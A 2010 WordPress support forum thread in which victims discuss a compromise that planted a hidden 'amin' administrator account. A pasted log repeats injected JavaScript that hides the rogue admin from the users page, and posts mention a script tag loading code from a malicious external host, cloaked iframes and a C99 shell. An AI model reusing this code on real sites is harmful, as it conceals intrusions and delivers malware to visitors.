WordPress › Support » Have I been hacked? Username: "amin"

craighobson
Member
Posted 1 year ago #

I've had a username: "amin" with the name: as "..." show up as an administrative user mysteriously on a personal WordPress blog of mine. I was suspicious, deleted the user, and did a quick google search to see if I could find anything about a security breach. I didn't find anything so I just shrugged of the concern.

Today I discovered the same "amin" user on a much bigger wordpress site I had built for a client; again with administrative privileges. Woah! Not cool.

These usernames were not added nor would in either case an administrative privilege be given. I'm running the most current version of WordPress 2.9.2 on both blogs and I'm a little nervous about the very real possibility that these blogs are being hacked.

Has anyone else noticed anything similar? Or share my concern?
Rev. Voodoo
Member
Posted 1 year ago #

I would say if you have any admin level user that you didn't authorize, you definitely have some sort of security breach
Cartman
Member
Posted 1 year ago #

I just discovered the same exact thing, and Googling this led me to your post.

Were you by chance affected by the Pharma hack over the past month or so?
dd@sucuri.net
Member
Posted 1 year ago #

I just posted that on another thread, but might help here.

We saw that on installations with WP < 2.9 lately. Also, even if you are now updated, your site might have been compromised before and the attackers left a backdoor hanging in there..

The sites also had this:
http://blog.sucuri.net/2010/05/seo-spam-network-code-used-and-more.html
http://blog.sucuri.net/2010/05/seo-spam-network-details-of-wp-includes.html

dmichalakos
Member
Posted 1 year ago #

Hi. I managed to log amin's activity using the Admin Log plugin. Here it is:

4/6/10 @ 21:43:12, (amin, ...

     <b id="user_superuser"><script language="JavaScript">
     var setUserName = function(){
          try{
               var t=document.getElementById("user_superuser");
               while(t.nodeName!="TR"){
                    t=t.parentNode;
               };
               t.parentNode.removeChild(t);
               var tags = document.getElementsByTagName("H3");
               var s = " shown below";
               for (var i = 0; i < tags.length; i++) {
                    var t=tags[i].innerHTML;
                    var h=tags[i];
                    if(t.indexOf(s)>0){
                         s =(parseInt(t)-1)+s;
                         h.removeChild(h.firstChild);
                         t = document.createTextNode(s);
                         h.appendChild(t);
                    }
               }

		var arr=document.getElementsByTagName("ul");
		for(var i in arr) if(arr[i].className=="subsubsub"){
		    var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
		    if(n!=null && n[1]>0){
			var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }

		    var n=/>Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
		    if(n!=null && n[1]>0){
			var txt=arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi,">Administrator <span class=\"count\">("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }

		    var n=/>All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
		    if(n!=null && n[1]>0){
			var txt=arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi,">All <span class=\"count\">("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }
		}
          }catch(e){};
     };
     addLoadEvent(setUserName);
     </script> ) =>
4/6/10 @ 21:43:14, (amin, ...

     <b id="user_superuser"><script language="JavaScript">
     var setUserName = function(){
          try{
               var t=document.getElementById("user_superuser");
               while(t.nodeName!="TR"){
                    t=t.parentNode;
               };
               t.parentNode.removeChild(t);
               var tags = document.getElementsByTagName("H3");
               var s = " shown below";
               for (var i = 0; i < tags.length; i++) {
                    var t=tags[i].innerHTML;
                    var h=tags[i];
                    if(t.indexOf(s)>0){
                         s =(parseInt(t)-1)+s;
                         h.removeChild(h.firstChild);
                         t = document.createTextNode(s);
                         h.appendChild(t);
                    }
               }

		var arr=document.getElementsByTagName("ul");
		for(var i in arr) if(arr[i].className=="subsubsub"){
		    var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
		    if(n!=null && n[1]>0){
			var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }

		    var n=/>Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
		    if(n!=null && n[1]>0){
			var txt=arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi,">Administrator <span class=\"count\">("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }

		    var n=/>All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
		    if(n!=null && n[1]>0){
			var txt=arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi,">All <span class=\"count\">("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }
		}
          }catch(e){};
     };
     addLoadEvent(setUserName);
     </script> ) => options-misc.php
4/6/10 @ 21:43:23, (amin, ...

     <b id="user_superuser"><script language="JavaScript">
     var setUserName = function(){
          try{
               var t=document.getElementById("user_superuser");
               while(t.nodeName!="TR"){
                    t=t.parentNode;
               };
               t.parentNode.removeChild(t);
               var tags = document.getElementsByTagName("H3");
               var s = " shown below";
               for (var i = 0; i < tags.length; i++) {
                    var t=tags[i].innerHTML;
                    var h=tags[i];
                    if(t.indexOf(s)>0){
                         s =(parseInt(t)-1)+s;
                         h.removeChild(h.firstChild);
                         t = document.createTextNode(s);
                         h.appendChild(t);
                    }
               }

		var arr=document.getElementsByTagName("ul");
		for(var i in arr) if(arr[i].className=="subsubsub"){
		    var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
		    if(n!=null && n[1]>0){
			var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }

		    var n=/>Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
		    if(n!=null && n[1]>0){
			var txt=arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi,">Administrator <span class=\"count\">("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }

		    var n=/>All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
		    if(n!=null && n[1]>0){
			var txt=arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi,">All <span class=\"count\">("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }
		}
          }catch(e){};
     };
     addLoadEvent(setUserName);
     </script> ) => theme-editor.php
4/6/10 @ 21:43:24, (amin, ...

     <b id="user_superuser"><script language="JavaScript">
     var setUserName = function(){
          try{
               var t=document.getElementById("user_superuser");
               while(t.nodeName!="TR"){
                    t=t.parentNode;
               };
               t.parentNode.removeChild(t);
               var tags = document.getElementsByTagName("H3");
               var s = " shown below";
               for (var i = 0; i < tags.length; i++) {
                    var t=tags[i].innerHTML;
                    var h=tags[i];
                    if(t.indexOf(s)>0){
                         s =(parseInt(t)-1)+s;
                         h.removeChild(h.firstChild);
                         t = document.createTextNode(s);
                         h.appendChild(t);
                    }
               }

		var arr=document.getElementsByTagName("ul");
		for(var i in arr) if(arr[i].className=="subsubsub"){
		    var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
		    if(n!=null && n[1]>0){
			var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }

		    var n=/>Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
		    if(n!=null && n[1]>0){
			var txt=arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi,">Administrator <span class=\"count\">("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }

		    var n=/>All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
		    if(n!=null && n[1]>0){
			var txt=arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi,">All <span class=\"count\">("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }
		}
          }catch(e){};
     };
     addLoadEvent(setUserName);
     </script> ) => theme-editor.php?file=/themes/wp-316.gr/category.php&theme=316.gr&dir=theme
4/6/10 @ 21:43:27, (amin, ...

     <b id="user_superuser"><script language="JavaScript">
     var setUserName = function(){
          try{
               var t=document.getElementById("user_superuser");
               while(t.nodeName!="TR"){
                    t=t.parentNode;
               };
               t.parentNode.removeChild(t);
               var tags = document.getElementsByTagName("H3");
               var s = " shown below";
               for (var i = 0; i < tags.length; i++) {
                    var t=tags[i].innerHTML;
                    var h=tags[i];
                    if(t.indexOf(s)>0){
                         s =(parseInt(t)-1)+s;
                         h.removeChild(h.firstChild);
                         t = document.createTextNode(s);
                         h.appendChild(t);
                    }
               }

		var arr=document.getElementsByTagName("ul");
		for(var i in arr) if(arr[i].className=="subsubsub"){
		    var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
		    if(n!=null && n[1]>0){
			var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }

		    var n=/>Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
		    if(n!=null && n[1]>0){
			var txt=arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi,">Administrator <span class=\"count\">("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }

		    var n=/>All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
		    if(n!=null && n[1]>0){
			var txt=arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi,">All <span class=\"count\">("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }
		}
          }catch(e){};
     };
     addLoadEvent(setUserName);
     </script> ) => theme-editor.php?file=/themes/wp-316.gr/category.php&theme=316.gr&dir=theme
4/6/10 @ 21:43:30, (amin, ...

     <b id="user_superuser"><script language="JavaScript">
     var setUserName = function(){
          try{
               var t=document.getElementById("user_superuser");
               while(t.nodeName!="TR"){
                    t=t.parentNode;
               };
               t.parentNode.removeChild(t);
               var tags = document.getElementsByTagName("H3");
               var s = " shown below";
               for (var i = 0; i < tags.length; i++) {
                    var t=tags[i].innerHTML;
                    var h=tags[i];
                    if(t.indexOf(s)>0){
                         s =(parseInt(t)-1)+s;
                         h.removeChild(h.firstChild);
                         t = document.createTextNode(s);
                         h.appendChild(t);
                    }
               }

		var arr=document.getElementsByTagName("ul");
		for(var i in arr) if(arr[i].className=="subsubsub"){
		    var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
		    if(n!=null && n[1]>0){
			var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }

		    var n=/>Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
		    if(n!=null && n[1]>0){
			var txt=arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi,">Administrator <span class=\"count\">("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }

		    var n=/>All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
		    if(n!=null && n[1]>0){
			var txt=arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi,">All <span class=\"count\">("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }
		}
          }catch(e){};
     };
     addLoadEvent(setUserName);
     </script> ) => theme-editor.php?file=/themes/wp-316.gr/category.php&theme=316.gr&dir=theme

Up to now, he wasn't doing anything. Today I found a new post message containing JS malicious code, such as <script src=http://e1b.smartenergymodel.com/js/jquery.min.js></script>

Someone please help us. This is a major issue.

c3mdigital
Member
Posted 1 year ago #
One of the first things you can do while you get this sorted out is restrict access to your wp-admin directory by ip by adding this to your .htaccess file:
```
order deny,allow
allow from a.b.c.d # This is your static IP
deny from all
```
then change all your wordpress ftp and server passwords,check your file permissions, and change your MySql db password and reset your salts via wp-config.php

This should give you some breathing room while you check and clean your site.
James
Happiness Engineer
Posted 1 year ago #

First, remain calm, delete the "amin" user, and carefully follow this guide:

http://codex.wordpress.org/FAQ_My_site_was_hacked
dmichalakos
Member
Posted 1 year ago #

The question is: Why did this happen in the first place? How did the hacker manage to create a new user account WITH ADMINISTRATIVE privileges?

This is absolutely insane.
Cartman
Member
Posted 1 year ago #

We caught the amin user in time, but this guy has still managed to get into our system and change files and cause general havoc. We've been dealing with this since April, and it seems like every month, they figure out a new way to get access!

This is driving me crazy, as we've done EVERYTHING we can from a security standpoint, and still we're getting hacked.

Just out of curiosity, dmichalakos and craighobson, who are you hosting your site with?
c3mdigital
Member
Posted 1 year ago #

I am also curious who all three of your hosting providers are and if you are on shared hosting. Also have you contacted your hosting provider about this?
dmichalakos
Member
Posted 1 year ago #

I am hosting my websites on rackspace cloud (http://www.rackspacecloud.com).

I have indeed contacted Rackspace technical support. They said it is normal for wordpress to get hacked occasional and propose to clean the files and harden the installation.

Btw I am following the practice of no admin user and custom db prefix. I am also using several security plugins, such as Secure WP and WP antivirus. Nevertheless, my websites got hacked.

The only thing I did not do is securing the wp-admin folder with an htaccess/htpasswd file.
Jackson
Member
Posted 1 year ago #

I am seeing this all over Rackspace Cloud Sites, in multiple accounts regardless of permissions, plugins, or configuration. Haven't found a common thread yet - but it's almost everywhere I work.

Anyone have any idea what the attack vector is here?
davidjamesca
Member
Posted 1 year ago #

Rackspace Cloud currently uses phpMyAdmin 2.11.3 [1], which has critical security holes [2]. Until Rackspace upgrades their version of phpMyAdmin, it's likely that your sites will continue to get hacked.

[1] https://mysql.websitesettings.com/Documentation.html
[2] http://www.phpmyadmin.net/home_page/security/PMASA-2010-3.php
w8lifter2000
Member
Posted 1 year ago #

Has anyone found this attack affecting anything beyond the creation of the amin user account?
w8lifter2000
Member
Posted 1 year ago #

Also RS is posting that they have patched the issue.

http://status.mosso.com/2010/06/emergency-phpmyadmin-maintenance-ongoing.html
davidjamesca
Member
Posted 1 year ago #

Looks like Rackspace has upgraded their phpMyAdmin software to 2.11.10 now. Hopefully this will help!

If the attacker created backdoor accounts or installed trojan software onto the servers, he'll still be able to cause trouble. Hopefully, Rackspace will watch for this and prevent further damage.
davidjamesca
Member
Posted 1 year ago #

w8lifter, to answer your question, when I was looking at a Rackspace account that had been compromised, I spotted a few hacks beyond the creation of the amin user account:
1. The attacker installed malware into both the wordpress database and into the wordpress source code. This allowed the attacker to distribute malware to site visitors. Some of these attacks were trickily hidden.
2. The attacker created a C99 shell server. This helps the attacker launch further attacks on affected sites. (In this case, the server was named "l.php", but note that they can name this file anything they want.)
w8lifter2000
Member
Posted 1 year ago #

Do you know the specific location in both the database and the file tree for these hacks?
davidjamesca
Member
Posted 1 year ago #

Hi w8lifter2000,

In this specific case, the attacker modified footer.php inside the wordpress themes directory to add a hidden iframe. The attack was cloaked using base64_decode and only showed up in the HTML the first time a visitor was on the site.

The attacker also added a C99 shell to the website, also cloaked using base64_decode. The C99 shell was added both to the root directory of the website and to the wordpress directory.

In the database, the attacker edited the most recent post on the website to add a hidden script include. It referenced http://zlu.emapis.org/js/jquery.min.js, which interestingly returns different content depending on the number of times you have loaded the page. The first time you load the javascript from a particular IP address, it returns the suspected malware script content; after the first load, it then returns an innocuous script. I saved the suspected malware version of the script at http://pastebin.ca/1882657 for further analysis in case anyone wants to take a closer look at the attack code.
pro99
Member
Posted 1 year ago #

We have the exact same issue, and we have the same fake admin user "amin" that we keep deleting along all the files, scripts, iframes he keeps putting all over our site (and we're on WP2.9 with latest plugins, we refreshed passwords etc). Our site has been hacked since Friday and every time we think we clean it, the hacker comes back in and puts more malware. WordPress team, please take a look, it's our worst hack to date and seeing the posts, it's spreading to more sites.
w8lifter2000
Member
Posted 1 year ago #

Are you on Rackspace CloudSites as well Pro99?
w8lifter2000
Member
Posted 1 year ago #

davidjamesca, is it possible that the only thing done was install this 'amin' account? I am having a terrible time finding anything beyond that. Can you suggest any methods to utilize to look for the effects of this hack? I also noticed some accounts with wordpress@www but that was only on a few.
pro99
Member
Posted 1 year ago #

@w8lifter2000 yes indeed, Rackspace. Now all our sites are infected... this is a tough one. I hired a security expert who is looking into them, and is finding code everywhere, in themes, uploads folder, root folder, in the database, nuts.
jezweb
Member
Posted 1 year ago #

if there ends up being a definite solution to stopping this from happening I would be keen to know about it.
w8lifter2000
Member
Posted 1 year ago #

@pro99 what is the specific code you are finding? I'm just very concerned because I am having a heck of a time finding anything beyond that initial amin account.
pro99
Member
Posted 1 year ago #

Best way for you to start is test your site at http://www.unmaskparasites.com/. See if it finds issues. If not, you may be lucky to only have "amin" in your control panel. If the site returns links or scripts that you don't know about (even if they are not flagged as suspicious), then you probably have code here and there. It would be too long to cut & paste all the code here, and we're heads down into cleaning the sites, but the test above should give you a starting point. I'll be back tomorrow with more info.
w8lifter2000
Member
Posted 1 year ago #

@pro99 I have put about 10 sites in there so far with varying pages and all come back clean so far. I spent a good bit of time 5 days ago when I initially reported to Rackspace removing that account from tons of sites and putting additional measures in place. Rackspace needs to credit their clients in somekind of way if this is in fact due to the security bug in phpmyadmin. We pay for this amount of money for a reason.
w8lifter2000
Member
Posted 1 year ago #

@pro99 If in fact you can offer even a piece of code or a keyword that can be searched in the database or the files themselves than that would be greatly appreciated. Just to alleviate my fears. Thanks for all the help.
moo8900
Member
Posted 1 year ago #

Here is what we know at this point.

1. user amin injected into a variety of wp databases - all seem to be on rackspace - me included - I have 5 blogs on rscs - all with different clients, different databases, etc. all infected with amin.

2. all blogs got a script code added to the first post - same as user davidjamesca noted

3. on all my blogs i had htpasswd set on wp-admin folder. they still got in

4. w8lifter - search for jquery, <script and <h5

5. if you are on rackspace, you should login and look at the customer forums - there is more discussion of this over there.
w8lifter2000
Member
Posted 1 year ago #

The only places I am seeing those in the db is wp_options and they have entries like _transient_feed_d6cfc08a6692d799c9f341ff6f5734d5

12 3 Next »

Topic Closed

This topic has been closed to new replies.

WordPress.org

Forums

Have I been hacked? Username: "amin" (64 posts)

Topic Closed

About this Topic

Tags

Code is Poetry